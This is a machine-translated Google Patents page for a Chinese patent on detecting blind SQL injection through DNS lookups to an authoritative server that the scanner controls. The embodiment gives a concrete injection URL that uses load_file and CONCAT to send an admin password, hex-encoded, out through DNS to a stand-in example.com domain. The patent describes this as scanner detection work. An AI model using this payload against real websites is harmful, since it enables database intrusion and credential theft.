CN109347805B - DNS-based echoless SQL injection detection method - Google Patents
DNS-based echoless SQL injection detection method Download PDFInfo
- Publication number
- CN109347805B CN109347805B CN201811096610.0A CN201811096610A CN109347805B CN 109347805 B CN109347805 B CN 109347805B CN 201811096610 A CN201811096610 A CN 201811096610A CN 109347805 B CN109347805 B CN 109347805B
- Authority
- CN
- China
- Prior art keywords
- dns server
- dns
- sql injection
- request
- detection
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Active
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1433—Vulnerability analysis
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L61/00—Network arrangements, protocols or services for addressing or naming
- H04L61/45—Network directories; Name-to-address mapping
- H04L61/4505—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols
- H04L61/4511—Network directories; Name-to-address mapping using standardised directories; using standardised directory access protocols using domain name system [DNS]
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/02—Protocols based on web technology, e.g. hypertext transfer protocol [HTTP]
Landscapes
- Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
Abstract
The invention relates to a DNS-based echoless SQL injection detection method, wherein an SQL injection scanner sends an HTTP request with a detection load to a target website, the DNS request is initiated to an authoritative DNS server after execution, the authoritative DNS server returns a response to the target website after analysis, the analysis result is recorded in a log, when the SQL injection scanner initiates an analysis record query request to the authoritative DNS server through the HTTP request, the log is queried, and the detection result of whether SQL injection vulnerabilities exist in the website is obtained according to whether the analysis record exists. The invention uses DNS analysis records with special coding formats to detect the SQL injection without echo, can realize accurate and rapid detection of bugs, reduce the detection time, improve the detection efficiency of the scanner and prevent the missing report and the false report.
Description
Technical Field
The invention relates to the technical field of security devices for protecting computers, components, programs or data thereof and preventing unauthorized behaviors, in particular to a DNS-based no-playback SQL injection detection method for realizing quick and effective detection and reducing the false alarm rate and the missing report rate of a scanner in SQL injection loopholes.
Background
SQL is a standard computer language used to access and operate database systems, and SQL statements are used to retrieve and update data in a database. SQL can work in conjunction with database programs and is widely used in database systems like Microsoft Access, DB2, Informix, Microsoft SQL Server, Oracle, Sybase, and others.
However, since developers use SQL statements unreasonably, SQL injection vulnerabilities are prevalent. In short, SQL injection holes are injected into the input strings, and neglecting checking in the poorly designed programs, these injected instructions will be mistaken by the database server as normal SQL instructions and run, so the system is damaged or invaded.
In the prior art, SQL injection detection is also one of the conventional detection methods. According to the type of the detected load, the detection mode of the SQL injection vulnerability comprises a Boolean-based blind injection, a time-based blind injection, an error-based SQL injection, an union-based SQL injection and other types, wherein the detection methods of the Boolean-based blind injection, the error-based SQL injection, the union-based SQL injection and the like are commonly used for detecting the SQL injection vulnerability with redisplay, and the time-based blind injection is commonly used for detecting the SQL injection vulnerability without the redisplay.
The detection methods such as blind injection based on Boolean, SQL injection based on error, SQL injection based on union and the like send different detection loads in the detection process to generate different HTTP response packets, and the different HTTP response packets are subjected to page analysis to judge whether a vulnerability exists; and for the SQL injection vulnerability without echoing, sending request packets with different loads, wherein response packets are the same, and according to the result of page analysis, the SQL vulnerability does not exist, so that the SQL vulnerability is not reported.
The blind annotation detection method based on time sends different detection load requests in the detection process, so that delayed response of a target website can be caused, the delayed time is determined by the load detection requests, and whether the SQL vulnerability exists or not is judged according to different response times, so the blind annotation based on time can be used for SQL vulnerability detection without playback; however, in an actual process, due to uncontrollable reasons such as network quality and the like, unnecessary time delay is caused in the transmission process of the HTTP data packet, and a large amount of false alarms are easily generated when the SQL injection vulnerability without playback is detected by using time-based blind injection.
Disclosure of Invention
In order to solve the problems in the prior art, the invention provides an optimized DNS-based non-echo SQL injection detection method.
The invention adopts the technical scheme that a DNS-based echoless SQL injection detection method comprises the following steps:
step 1: the SQL injection scanner sends an HTTP request with a detection load to a target website;
step 2: the detection load enters a database server through a target website, a detection code in the detection load is executed by the database and a DNS request aiming at an authoritative DNS server is initiated;
and step 3: the authoritative DNS server analyzes the DNS request and returns a response to the target website, and the analysis result is recorded in a log;
and 4, step 4: judging whether the SQL injection scanner initiates an analysis result query request to an authoritative DNS server through the HTTP request, if so, carrying out the next step, otherwise, returning to the step 1;
and 5: and the authoritative DNS server responds to the query request of the SQL injection scanner to query the log, if the analysis record shows that the SQL injection vulnerability exists in the website, otherwise, the SQL injection vulnerability does not exist, and the SQL injection detection result is returned.
Preferably, in step 2, the DNS request includes a special string used for detecting an SQL vulnerability in the SQL injection scanner.
Preferably, in step 3, the resolving the DNS request for the authoritative DNS server by the authoritative DNS server includes the following steps:
step 3.1: the DNS request reaches a default DNS server;
step 3.2: the default DNS server cannot analyze the data, and a query request is initiated by a parent DNS server of the default DNS server;
step 3.3: the parent level DNS server obtains an authoritative DNS server address according to the DNS request analysis;
step 3.4: the parent level DNS server returns an authoritative DNS server address to the default DNS server;
step 3.5: the default DNS server initiates a DNS query request to the authoritative DNS server by the authoritative DNS server address again;
step 3.6: and the authoritative DNS server analyzes the DNS request and returns a correct IP address to the default DNS server to finish the analysis of the DNS request.
The invention provides an optimized non-echo SQL injection detection method based on a DNS (Domain name System), which is characterized in that an HTTP request with a detection load is sent to a target website through an SQL injection scanner, the DNS request aiming at an authoritative DNS server is initiated after execution, the authoritative DNS server returns a response to the target website after analysis, an analysis result is recorded in a log, when the SQL injection scanner initiates an analysis record query request to the authoritative DNS server through the HTTP request, the log is queried, and a detection result of whether the website has SQL injection vulnerabilities is obtained according to whether the analysis record exists or not. The method uses the DNS analysis record with a special coding format to detect the SQL injection without the echo, solves the problems of missed report caused by a Boolean-based blind injection, an error-based SQL injection and a union-based SQL injection detection means and the false report caused by a time-based blind injection detection means in the SQL injection detection process without the echo, can realize accurate and rapid detection of the loophole, reduce the detection time, improve the detection efficiency of the scanner and prevent the missed report and the false report.
Drawings
FIG. 1 is a flow chart of the present invention.
Detailed Description
The present invention is described in further detail with reference to the following examples, but the scope of the present invention is not limited thereto.
The invention relates to a DNS-based non-echoing SQL injection detection method, wherein DNS is a service of the Internet, and is used as a distributed database for mapping domain names and IP addresses to each other, so that people can more conveniently access the Internet, obtain corresponding conversion of the domain names and the IP addresses through DNS analysis, and finish the conversion by a DNS server.
Com, the domain name is resolved using an authoritative DNS, and a target website detected to have an SQL injection vulnerability, the method includes the following steps.
Step 1: the SQL injection scanner sends an HTTP request with the detection payload to the target website.
In the present invention, an embodiment of HTTP request is given:
http://example.com/sqli.phpid=1union select1,2,load_file(CONCAT('\\dns_sqli_',(SELECT hex(pass)FROM test.test_user WHERE name='admin'LIMIT 1),'.example.com\abc'))。
step 2: and the detection load enters the database server through the target website, and the detection code in the detection load is executed by the database and initiates a DNS request aiming at the authoritative DNS server.
In the step 2, the DNS request includes a special character string for detecting an SQL vulnerability in the SQL injection scanner.
In the invention, the DNS request aiming at the authoritative DNS server comprises the following steps: dns _ sqli _ permitted.example.com; a special string such as dns _ sqli _ password.
And step 3: and the authoritative DNS server analyzes the DNS request and returns a response to the target website, and the analysis result is recorded in a log.
In step 3, the step of resolving the DNS request for the authoritative DNS server by the authoritative DNS server includes the steps of:
step 3.1: the DNS request reaches a default DNS server;
step 3.2: the default DNS server cannot analyze the data, and a query request is initiated by a parent DNS server of the default DNS server;
step 3.3: the parent level DNS server obtains an authoritative DNS server address according to the DNS request analysis;
step 3.4: the parent level DNS server returns an authoritative DNS server address to the default DNS server;
step 3.5: the default DNS server initiates a DNS query request to the authoritative DNS server by the authoritative DNS server address again;
step 3.6: and the authoritative DNS server analyzes the DNS request and returns a correct IP address to the default DNS server to finish the analysis of the DNS request.
In the invention, the DNS request is made to be test.example.com, and because the parent DNS server is not an analysis server of example.com, the test.example.com cannot be analyzed, but the test.example.com can be analyzed to be a subdomain of example.com, and meanwhile, the parent DNS can analyze an authoritative DNS server address of the example.com, so that the parent DNS server returns the authoritative DNS server address to the default DNS server, the default DNS server re-initiates a DNS query request of the test.example.com to the authoritative DNS server, and the authoritative DNS server analyzes the DNS request and returns a correct IP address of the test.example.com to the default DNS server.
And 4, step 4: judging whether the SQL injection scanner initiates an analysis result query request to an authoritative DNS server through the HTTP request, if so, carrying out the next step, otherwise, returning to the step 1;
in the present invention, the query request is as follows: querying an authoritative DNS server whether there is a request containing a "DNS _ sql _" string.
And 5: and the authoritative DNS server responds to the query request of the SQL injection scanner to query the log, if the analysis record shows that the SQL injection vulnerability exists in the website, otherwise, the SQL injection vulnerability does not exist, and the SQL injection detection result is returned.
The method comprises the steps of sending an HTTP request with a detection load to a target website through an SQL injection scanner, initiating a DNS request aiming at an authoritative DNS server after execution, returning a response to the target website after analysis by the authoritative DNS server, recording an analysis result in a log, inquiring the log when the SQL injection scanner initiates an analysis record inquiry request to the authoritative DNS server through the HTTP request, and obtaining a detection result of whether the website has SQL injection vulnerabilities according to whether the analysis record exists. The method uses the DNS analysis record with a special coding format to detect the SQL injection without the echo, solves the problems of missed report caused by a Boolean-based blind injection, an error-based SQL injection and a union-based SQL injection detection means and the false report caused by a time-based blind injection detection means in the SQL injection detection process without the echo, can realize accurate and rapid detection of the loophole, reduce the detection time, improve the detection efficiency of the scanner and prevent the missed report and the false report.
Claims (2)
1. A DNS-based echoless SQL injection detection method is characterized in that: the method comprises the following steps:
step 1: the SQL injection scanner sends an HTTP request with a detection load to a target website;
step 2: the detection load enters a database server through a target website, a detection code in the detection load is executed by the database and a DNS request aiming at an authoritative DNS server is initiated;
and step 3: the authoritative DNS server resolves the DNS request and returns a response to the target website, and the method comprises the following steps:
step 3.1: the DNS request reaches a default DNS server;
step 3.2: the default DNS server cannot analyze the data, and a query request is initiated by a parent DNS server of the default DNS server;
step 3.3: the parent level DNS server obtains an authoritative DNS server address according to the DNS request analysis;
step 3.4: the parent level DNS server returns an authoritative DNS server address to the default DNS server;
step 3.5: the default DNS server initiates a DNS query request to the authoritative DNS server by the authoritative DNS server address again;
step 3.6: the authoritative DNS server analyzes the DNS request and returns a correct IP address to a default DNS server to finish the analysis of the DNS request;
recording the analysis result in a log;
and 4, step 4: judging whether the SQL injection scanner initiates an analysis result query request to an authoritative DNS server through the HTTP request, if so, carrying out the next step, otherwise, returning to the step 1;
and 5: and the authoritative DNS server responds to the query request of the SQL injection scanner to query the log, if the analysis record shows that the SQL injection vulnerability exists in the website, otherwise, the SQL injection vulnerability does not exist, and the SQL injection detection result is returned.
2. The DNS-based no-echo SQL injection detection method according to claim 1, characterized in that: in the step 2, the DNS request includes a special character string for detecting an SQL vulnerability in the SQL injection scanner.
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201811096610.0A CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201811096610.0A CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN109347805A CN109347805A (en) | 2019-02-15 |
| CN109347805B true CN109347805B (en) | 2021-06-15 |
Family
ID=65305552
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201811096610.0A Active CN109347805B (en) | 2018-09-19 | 2018-09-19 | DNS-based echoless SQL injection detection method |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN109347805B (en) |
Families Citing this family (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN111953638B (en) * | 2019-05-17 | 2023-06-27 | 北京京东尚科信息技术有限公司 | Network attack behavior detection method and device and readable storage medium |
| CN111600885A (en) * | 2020-05-15 | 2020-08-28 | 北京铭图天成信息技术有限公司 | SQL injection vulnerability detection method and device, equipment and storage medium |
| CN111597559B (en) * | 2020-05-15 | 2023-10-13 | 北京铭图天成信息技术有限公司 | System command injection vulnerability detection method and device, equipment and storage medium |
| CN114157452B (en) * | 2021-11-12 | 2024-07-23 | 湖北天融信网络安全技术有限公司 | Method and system for detecting XXE loopholes based on HTTP connection platform |
| CN114143047A (en) * | 2021-11-17 | 2022-03-04 | 湖北天融信网络安全技术有限公司 | Vulnerability detection method and device, terminal equipment, Web server and storage medium |
| CN113987521B (en) * | 2021-12-28 | 2022-03-22 | 北京安华金和科技有限公司 | Scanning processing method and device for database bugs |
| CN114826743A (en) * | 2022-04-27 | 2022-07-29 | 湖北天融信网络安全技术有限公司 | Vulnerability detection method, device, equipment and medium |
Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN105631341A (en) * | 2015-12-18 | 2016-06-01 | 北京奇虎科技有限公司 | Blind test method and device of bug |
| CN106612339A (en) * | 2015-10-27 | 2017-05-03 | 中国电信股份有限公司 | Domain name updating method, system and main DNS (Domain Name System) server |
| CN106790195A (en) * | 2016-12-30 | 2017-05-31 | 北京神州绿盟信息安全科技股份有限公司 | A kind of SQL injection detection method and device |
| CN108509792A (en) * | 2017-02-23 | 2018-09-07 | 腾讯科技(深圳)有限公司 | A kind of injection loophole detection method and device |
Family Cites Families (2)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| US7657540B1 (en) * | 2003-02-04 | 2010-02-02 | Seisint, Inc. | Method and system for linking and delinking data records |
| CN102136051B (en) * | 2011-05-06 | 2013-02-20 | 南开大学 | Method for driving web application penetration testing by applying SGM-SQL (sage grant management-structured query language) injection model |
-
2018
- 2018-09-19 CN CN201811096610.0A patent/CN109347805B/en active Active
Patent Citations (4)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN106612339A (en) * | 2015-10-27 | 2017-05-03 | 中国电信股份有限公司 | Domain name updating method, system and main DNS (Domain Name System) server |
| CN105631341A (en) * | 2015-12-18 | 2016-06-01 | 北京奇虎科技有限公司 | Blind test method and device of bug |
| CN106790195A (en) * | 2016-12-30 | 2017-05-31 | 北京神州绿盟信息安全科技股份有限公司 | A kind of SQL injection detection method and device |
| CN108509792A (en) * | 2017-02-23 | 2018-09-07 | 腾讯科技(深圳)有限公司 | A kind of injection loophole detection method and device |
Non-Patent Citations (1)
| Title |
|---|
| 巧用DNSlog实现无回显注入;Afant1;《https://www.cnblogs.com/afanti/p/8047530.html》;20171216;第1-4页 * |
Also Published As
| Publication number | Publication date |
|---|---|
| CN109347805A (en) | 2019-02-15 |
Similar Documents
| Publication | Publication Date | Title |
|---|---|---|
| CN109347805B (en) | DNS-based echoless SQL injection detection method | |
| CN106357696B (en) | SQL injection attack detection method and system | |
| US8578481B2 (en) | Method and system for determining a probability of entry of a counterfeit domain in a browser | |
| CN113301012B (en) | Network threat detection method and device, electronic equipment and storage medium | |
| CN108574742B (en) | Domain name information collection method and domain name information collection device | |
| CN106302440B (en) | Method for acquiring suspicious phishing websites through multiple channels | |
| CN109768992B (en) | Webpage malicious scanning processing method and device, terminal device and readable storage medium | |
| US8955123B2 (en) | Method and system for preventing malicious communication | |
| CN107733699B (en) | Internet asset security management method, system, device and readable storage medium | |
| US11593502B2 (en) | Detecting behavioral anomalies in user-data access logs | |
| CN108156270B (en) | Domain name request processing method and device | |
| CN104468860A (en) | Method and device for recognizing risk of domain name resolution server | |
| CN108282446B (en) | Method and apparatus for identifying scanner | |
| CN105404816A (en) | Content-based vulnerability detection method and device | |
| CN105635064A (en) | CSRF attack detection method and device | |
| CN113055399A (en) | Attack success detection method, system and related device for injection attack | |
| CN104378255A (en) | Method and device for detecting web malicious user | |
| CN111031025B (en) | Method and device for automatically detecting and verifying Webshell | |
| CN114143047A (en) | Vulnerability detection method and device, terminal equipment, Web server and storage medium | |
| CN113961930A (en) | SQL injection vulnerability detection method and device and electronic equipment | |
| CN111953638B (en) | Network attack behavior detection method and device and readable storage medium | |
| CN107040546B (en) | Domain name hijacking detection and linkage handling method and system | |
| CN102223422A (en) | Domain name system (DNS) message processing method and network safety equipment | |
| US8271829B2 (en) | Network connection device and method for detecting network errors | |
| CN109302433B (en) | Method, device, equipment and storage medium for detecting remote command execution vulnerability |
Legal Events
| Date | Code | Title | Description |
|---|---|---|---|
| PB01 | Publication | ||
| PB01 | Publication | ||
| SE01 | Entry into force of request for substantive examination | ||
| SE01 | Entry into force of request for substantive examination | ||
| GR01 | Patent grant | ||
| GR01 | Patent grant |